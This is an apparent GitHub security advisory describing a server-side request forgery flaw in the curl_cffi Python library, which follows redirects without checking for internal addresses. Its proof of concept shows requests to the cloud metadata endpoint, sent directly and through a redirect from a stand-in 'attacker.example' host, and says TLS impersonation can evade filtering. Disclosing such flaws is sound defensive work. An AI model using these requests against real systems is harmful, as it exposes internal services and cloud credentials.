GHSA-qw2m-4pqf-rmpp

Summary

curl_cffi does not restrict requests to internal IP ranges, and follows redirects automatically via the underlying libcurl.

Because of this, an attacker-controlled URL can redirect requests to internal services such as cloud metadata endpoints. In addition, curl_cffi’s TLS impersonation feature can make these requests appear as legitimate browser traffic, which may bypass certain network controls.

Details

The issue comes from how curlcffi handles outbound requests - User-supplied URLs are passed directly to libcurl without checking whether they resolve to internal IP ranges (e.g., 127.0.0.1, 169.254.0.0/16). - Redirects are automatically followed (CURLOPTFOLLOWLOCATION = 1) inside libcurl. - There is no validation of redirect destinations at the Python layer.

This means that even if an application only allows requests to external URLs, an attacker can - Provide a URL pointing to an attacker-controlled server - Return a redirect response pointing to an internal service - Have curl_cffi follow that redirect automatically

As a result, internal endpoints (such as cloud instance metadata APIs) can be accessed.

Additionally, curl_cffi supports TLS fingerprint impersonation (e.g., impersonate="chrome"). In environments where outbound requests are filtered based on TLS fingerprinting, this can make such requests harder to detect or block

This behavior is similar to previously reported redirect-based SSRF issues such as CVE-2025-68616, where redirects allowed access to unintended internal resources.

PoC

1. Direct internal request

   import curl_cffi
   resp = curl_cffi.get("http://169.254.169.254/latest/meta-data/")
   print(resp.text)
   

2. Redirect to internal service Attacker server:

   GET /test
   → 302 Location: http://169.254.169.254/latest/meta-data/
   

   Victim code:

   import curl_cffi
   resp = curl_cffi.get("https://attacker.example/test")
   print(resp.text)
   

   Result

• Initial request goes to attacker server
• Redirect is returned
• libcurl follows the redirect automatically
• Internal metadata endpoint is accessed

3. With TLS impersonation

   import curl_cffi\
   resp = curl_cffi.get(
       "https://attacker.example/test",
       impersonate="chrome")
   

   In some environments, this may help the request bypass TLS-based filtering controls.

Impact

An attacker who can control the requested URL may be able to: - Access internal network services - Reach cloud metadata endpoints and retrieve sensitive information - Bypass certain outbound filtering mechanisms (depending on environment) This corresponds to CWE-918 Server-Side Request Forgery.